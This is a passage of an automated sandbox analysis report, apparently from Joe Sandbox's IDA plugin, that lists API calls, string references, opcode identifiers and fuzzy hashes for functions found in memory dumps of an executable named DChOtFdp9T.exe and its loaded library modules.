                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3111F22B24F46C9EB008B60E8656B833A4FB19758F440F35DA7DC67E8EF78D1588340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
                                                                                                                                                                                                                            • Instruction ID: 2e52023be74b661de9da9fea0a7cd0cfabb313305cf0ce80c5604d4f41072ec3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc73cc68af297474fab7335d34c7ca35ab92d27d4957ccf63133921774b26e3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D118E32B14F028AEB00CF65E8542B837A4FB59B6CF240E35DA2D867A5DFBCD1948340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                            • Instruction ID: 798705331805ee65fd2c8f0b899eebd1597bd171f5ab408d361a278192b6ad9a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87111836B18F058AEB048B60E8647A833A4FB19758F841E31DE6D467A8EF78D5948380
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                            • Opcode ID: cb146d52e44fda47aec41e3b327be8b66e5931a88c42cb1600bd2f9a4b903df4
                                                                                                                                                                                                                            • Instruction ID: 947e59aa0ff00b7d31ccd7d94a876109dd5e4c5513df529f885daefdeeb058f9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb146d52e44fda47aec41e3b327be8b66e5931a88c42cb1600bd2f9a4b903df4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D41F712A0838241FB669B27961137A5E90EF81BA8F345235EE5C87AD7DFBCD441D700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A7EC6
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: HeapFree.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF60299BC15), ref: 00007FF6029A7EE4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                            • API String ID: 3580290477-4277806258
                                                                                                                                                                                                                            • Opcode ID: dc876d716bcbc962327dfecb76c3da50076091fbe61dc3bbb62dbd28c163c069
                                                                                                                                                                                                                            • Instruction ID: e302487437b13d2d169ae98e836b5336f8775044e293c54a5e2d5054ca72df63
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc876d716bcbc962327dfecb76c3da50076091fbe61dc3bbb62dbd28c163c069
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20419D36E08B1295EB55DF63A4410FC6BA4FF45B98B754035EA0E87B87DEBCE5818380
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: .$:
                                                                                                                                                                                                                            • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                            • Opcode ID: 2f043e4c71c20d88896d15289d2095323445f99b8f170c67af765481113726d7
                                                                                                                                                                                                                            • Instruction ID: 6d6cea6df54d7a62a9c2cb80a9e413063e66e52ea0790ee102d1ac94d420378d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f043e4c71c20d88896d15289d2095323445f99b8f170c67af765481113726d7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD413A22F18B5288FB119BB2D8511BC3EB46F5479CF640035DE0DA7E86EFBDA4468394
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                            • Opcode ID: edf8a3e1b0c94e4cd4a87b59cb25ff96c40068475c65d4e51d5884f36b3b6636
                                                                                                                                                                                                                            • Instruction ID: c4f6d1bb6b342c91491d016525a2ce22b6917faecb06cf5c6fe46b806fca8785
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edf8a3e1b0c94e4cd4a87b59cb25ff96c40068475c65d4e51d5884f36b3b6636
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE41B222B19B8186DB20CF26E4553A96BA0FF98B98F604035EE4DC7799DF7CD441C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878198987.00007FFE0CFE0000.00000002.00000001.01000000.0000002A.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878236359.00007FFE0CFE3000.00000002.00000001.01000000.0000002A.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878254447.00007FFE0CFE4000.00000004.00000001.01000000.0000002A.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878272126.00007FFE0CFE5000.00000002.00000001.01000000.0000002A.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                                            • String ID: (idx>=1) && (idx<=10)$src/AESNI.c
                                                                                                                                                                                                                            • API String ID: 3234217646-2495715787
                                                                                                                                                                                                                            • Opcode ID: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
                                                                                                                                                                                                                            • Instruction ID: 07d2fd5b2a4663238ae33149dd383316dd07cd2b7d71529273161ed6e1d05840
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E021442394D3C14BD7034F75949909C7FA0EF96B50B99C1BAC38483716EA9C99CBC711
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: fd671bd2fd5218516e653d4e6dbf8a613ca8f5cbf383185d7d42014db33af942
                                                                                                                                                                                                                            • Instruction ID: 705a91dfcbe9fcdf46b89280abd40ad315a33f1b21cb9da116a45739f56c91ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd671bd2fd5218516e653d4e6dbf8a613ca8f5cbf383185d7d42014db33af942
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2821D032E0838182EB209B16E04426D77E5FF88B8CF654035DA8D83686DFBCE945C791
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_dump_indentO_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (0x%04x)
                                                                                                                                                                                                                            • API String ID: 2723189173-3351362759
                                                                                                                                                                                                                            • Opcode ID: 533420b7bada7848348840fd67616d21adac2f845cfff8de302899fab3b0c9cc
                                                                                                                                                                                                                            • Instruction ID: 9c4b0bb72734b4a1645806896382776fbfd963e6aa6ca7636a6d9b223e225d66
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 533420b7bada7848348840fd67616d21adac2f845cfff8de302899fab3b0c9cc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63119623B0D59246EB148A16F135ABD6751EB41790F944232CEBEC3AD9EE2DF152C704
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_dump_indentO_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (%d)
                                                                                                                                                                                                                            • API String ID: 2723189173-2206749211
                                                                                                                                                                                                                            • Opcode ID: 805d2e53cfd7709015aea11038eb697881fba96565e0fdb4071b72a2519350e7
                                                                                                                                                                                                                            • Instruction ID: 21acdf2f1ed150dce7f878c31b10e947c831224885e3f7f2f93fa94aa5e3c20e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 805d2e53cfd7709015aea11038eb697881fba96565e0fdb4071b72a2519350e7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76110823F0C69246EB518A26B525A7A2B929B45BE0F454232CEFDD77C9ED3CE041C340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_dump_indentO_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (%d)
                                                                                                                                                                                                                            • API String ID: 2723189173-2206749211
                                                                                                                                                                                                                            • Opcode ID: 6e54556c157042b7d04aed057dbc6c54d1cf6f53d7ddc600a4537625481a468f
                                                                                                                                                                                                                            • Instruction ID: 88eb7eb49bbdaa49667939ebcdd76d35e9a4552399fe1ed45e54b9fc7cadc296
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e54556c157042b7d04aed057dbc6c54d1cf6f53d7ddc600a4537625481a468f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2118633B0C69686EB548A16F0349B96B51AB45B90F848232CEBEC77D9DE3DF142C704
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                            • Opcode ID: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction ID: 3673b7a82775ae432b3f80559ef6666884ac70d95840435f2e1f94460cc91143
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B111932A18B8182EB61CF1AE5402697BE5FF88B98F684231DACD47765DF7CD5618B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (%d)
                                                                                                                                                                                                                            • API String ID: 1860387303-2206749211
                                                                                                                                                                                                                            • Opcode ID: 84165c5a742860087a4181324a4083d95e8c5db66e94e6bdcefa2ca088d4fd60
                                                                                                                                                                                                                            • Instruction ID: 5ece05ca511cc7390598d601c71183a3099078f0fbedeac2c69f928e92467560
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84165c5a742860087a4181324a4083d95e8c5db66e94e6bdcefa2ca088d4fd60
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7018437B0C65686DB148B15B024AB96B50F786B90F958231CEBEC77D9DE3CE1428744
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                            • Opcode ID: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction ID: 636880391f91f74f2499da15704166a7e936f03cf19eb8fe73e3cbdd05199b15
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9018F61E1830286FB70AF62A46127E2BA0FF54B0CFB01135D64DC6A86DFADE504CB54
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_snprintf
                                                                                                                                                                                                                            • String ID: RC2(128)$SHA256
                                                                                                                                                                                                                            • API String ID: 3142812517-4086923701
                                                                                                                                                                                                                            • Opcode ID: c4dc322602219df1bdf4739992d4b7258ce7f788ac0d61bfc740f83ae17cdb61
                                                                                                                                                                                                                            • Instruction ID: a65ae8ee697879e1026ecf62e999022edfa64a1b402fad7c6d2295797d77d1b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4dc322602219df1bdf4739992d4b7258ce7f788ac0d61bfc740f83ae17cdb61
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D015E32F0869281E3649B19A4B48BAA7A0FB41358F490336DDBDD3ADCCE3CE9518640
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_snprintf
                                                                                                                                                                                                                            • String ID: IDEA(128)$SHA256
                                                                                                                                                                                                                            • API String ID: 3142812517-2727354722
                                                                                                                                                                                                                            • Opcode ID: 62ca375ee18db03320bd9c7ad3b0bdd889be5ac6983943881f7c4b7a8b82ce69
                                                                                                                                                                                                                            • Instruction ID: eeac31d6d856d8939310b30947972390727079f42d43b53ca64df66a544addaa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62ca375ee18db03320bd9c7ad3b0bdd889be5ac6983943881f7c4b7a8b82ce69
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC015E32F0869681E3648B19B4B48BAA7A0FB41358F490336DDBDD3ADCCE3CE9518640
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_snprintf
